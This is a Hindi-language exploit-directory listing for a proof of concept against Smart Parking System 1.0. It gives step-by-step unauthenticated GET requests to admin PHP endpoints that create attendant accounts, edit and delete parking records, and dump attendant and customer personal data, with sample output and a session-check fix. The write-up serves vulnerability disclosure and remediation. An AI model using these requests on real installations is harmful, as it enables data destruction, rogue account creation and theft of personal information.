Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10243-AUTH — प्रमाण-अवधारणा जो स्मार्ट पार्किंग सिस्टम 1.0 में महत्वपूर्ण एडमिन कार्यों तक बिना प्रमाणीकरण के पहुंच प्रदर्शित करती है, जिससे खाता निर्माण, डेटा हेरफेर और PII का खुलासा संभव होता है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-10243-auth
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

प्रमाण-अवधारणा जो स्मार्ट पार्किंग सिस्टम 1.0 में महत्वपूर्ण एडमिन कार्यों तक बिना प्रमाणीकरण के पहुंच प्रदर्शित करती है, जिससे खाता निर्माण, डेटा हेरफेर और PII का खुलासा संभव होता है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

स्मार्ट पार्किंग सिस्टम 1.0 - महत्वपूर्ण एडमिन फ़ंक्शंस तक अनधिकृत पहुंच

भेद्यता जानकारी

फ़ील्डविवरण
उत्पादस्मार्ट पार्किंग सिस्टम
विक्रेताcode-projects.org
संस्करण1.0
भेद्यता वर्गमहत्वपूर्ण फ़ंक्शन के लिए अनुपस्थित प्रमाणीकरण (CWE-306)
CVE IDलंबित
CVSS स्कोर9.8 गंभीर (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
प्रमाणीकरण आवश्यककोई नहीं
प्रभावित फ़ाइलेंattendant.php, edit.php, basic_table.php, basic_table2.php, admin_request.php

विवरण

code-projects.org द्वारा स्मार्ट पार्किंग सिस्टम 1.0 कई एडमिन-ओनली एंडपॉइंट्स पर प्रमाणीकरण लागू करने में विफल रहता है। एक अनधिकृत रिमोट हमलावर बिना किसी सत्र कुकी के सीधे इन एंडपॉइंट्स तक पहुंच सकता है और विशेषाधिकार प्राप्त कार्य कर सकता है, जिसमें अटेंडेंट खाते बनाना, पार्किंग रिकॉर्ड संपादित और हटाना, और सभी ग्राहक PII और बुकिंग डेटा देखना शामिल है।

इस भेद्यता का शोषण करने के लिए कोई क्रेडेंशियल, कोई सत्र टोकन, और किसी वैध उपयोगकर्ता से कोई इंटरैक्शन आवश्यक नहीं है।


हमले की श्रृंखला अवलोकन

root@kitploit:~
कोई क्रेडेंशियल नहीं / कोई सत्र नहीं
        ↓
एडमिन एंडपॉइंट्स पर सीधा GET अनुरोध
        ↓
attendant.php     → नकली अटेंडेंट खाते बनाएं
edit.php          → किसी भी पार्किंग रिकॉर्ड को पढ़ें और अधिलेखित करें
basic_table.php   → किसी भी पार्किंग रिकॉर्ड को हटाएं
basic_table2.php  → सभी अटेंडेंट PII डंप करें
admin_request.php → सभी ग्राहक ईमेल और बुकिंग डेटा डंप करें
        ↓
पूर्ण एडमिन कार्यक्षमता से समझौता

चरण-दर-चरण प्रमाण की अवधारणा

चरण 1 — अनधिकृत स्थिति की पुष्टि करें

बिना कुकीज़ के एक नया ब्राउज़र सत्र खोलें। एप्लिकेशन रूट पर नेविगेट करें। लॉगिन पेज प्रस्तुत किया जाता है जो पुष्टि करता है कि कोई सक्रिय सत्र मौजूद नहीं है:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

चरण 2 — अटेंडेंट निर्माण पैनल तक पहुंचें (कोई प्रमाणीकरण नहीं)

सीधे अटेंडेंट पंजीकरण एंडपॉइंट पर नेविगेट करें:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

परिणाम: पूरा "Add Parking Attendant Details" फ़ॉर्म पहला नाम, अंतिम नाम, मोबाइल नंबर, सड़क, उपयोगकर्ता नाम और पासवर्ड के लिए फ़ील्ड के साथ लोड होता है। एक हमलावर सिस्टम एक्सेस के साथ एक नकली अटेंडेंट खाता पंजीकृत कर सकता है।


चरण 3 — पार्किंग रिकॉर्ड पढ़ें और संशोधित करें (कोई प्रमाणीकरण नहीं)

सीधे पार्किंग रिकॉर्ड संपादन एंडपॉइंट पर नेविगेट करें:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

परिणाम: "Update Parkings Details" फ़ॉर्म लाइव डेटाबेस मानों के साथ पहले से भरा हुआ लोड होता है:

root@kitploit:~
City:   Mombasa
Street: Tudor
Slots:  150
Cost:   500

एक हमलावर किसी भी फ़ील्ड को अधिलेखित कर सकता है और परिवर्तनों को सीधे डेटाबेस में सहेजने के लिए सबमिट कर सकता है।


चरण 4 — पार्किंग रिकॉर्ड हटाएं (कोई प्रमाणीकरण नहीं)

हटाने वाले एंडपॉइंट पर सीधा GET अनुरोध भेजें:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

परिणाम: एप्लिकेशन निम्न के साथ प्रतिक्रिया करता है:

root@kitploit:~
Parking deleted successfully

रिकॉर्ड डेटाबेस में स्थायी रूप से नष्ट हो जाता है। कोई प्रमाणीकरण, कोई CSRF टोकन, और कोई पुष्टिकरण संकेत आवश्यक नहीं है।


चरण 5 — सभी पार्किंग अटेंडेंट डंप करें (कोई प्रमाणीकरण नहीं)

सीधे अटेंडेंट सूची एंडपॉइंट पर नेविगेट करें:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

परिणाम: नाम, मोबाइल नंबर और निर्दिष्ट सड़कों सहित पूरी अटेंडेंट सूची लौटाई जाती है:

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

चरण 6 — सभी ग्राहक बुकिंग डेटा डंप करें (कोई प्रमाणीकरण नहीं)

सीधे एडमिन बुकिंग अनुरोध एंडपॉइंट पर नेविगेट करें:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

परिणाम: ईमेल, स्लॉट, घंटे और लागत सहित सभी ग्राहक बुकिंग रिकॉर्ड लौटाए जाते हैं:

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

प्रभाव

  • पूर्ण एडमिन पैनल पहुंच — सभी विशेषाधिकार प्राप्त कार्यक्षमता शून्य क्रेडेंशियल के साथ पहुंच योग्य
  • डेटा विनाश — किसी भी पार्किंग रिकॉर्ड को स्थायी रूप से हटाया जा सकता है
  • डेटा हेरफेर — किसी भी पार्किंग रिकॉर्ड को संशोधित किया जा सकता है
  • विशेषाधिकार वृद्धि — सिस्टम लॉगिन के साथ नकली अटेंडेंट खाते बनाए जा सकते हैं
  • PII एक्सपोज़र — सभी ग्राहक ईमेल और बुकिंग इतिहास एकत्र किए जाते हैं
  • अटेंडेंट डेटा लीक — नाम और फ़ोन नंबर सहित पूरी सूची उजागर होती है

प्रभावित फ़ाइलों का सारांश

फ़ाइलभेद्यता
attendant.phpअनधिकृत अटेंडेंट खाता निर्माण
edit.phpपार्किंग रिकॉर्ड तक अनधिकृत पढ़ने/लिखने की पहुंच
basic_table.phpपार्किंग रिकॉर्ड का अनधिकृत विलोपन
basic_table2.phpपूर्ण अटेंडेंट PII तक अनधिकृत पहुंच
admin_request.phpसभी ग्राहक बुकिंग डेटा तक अनधिकृत पहुंच

निवारण

प्रत्येक एडमिन-मुख PHP फ़ाइल के शीर्ष पर एक सत्र प्रमाणीकरण जांच जोड़ें:

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

संदर्भ

  • विक्रेता होमपेज
  • CWE-306: महत्वपूर्ण फ़ंक्शन के लिए अनुपस्थित प्रमाणीकरण
  • OWASP: टूटा एक्सेस नियंत्रण

खोजकर्ता

  • शोधकर्ता: इमाद अल्वी
टूल डाउनलोड करें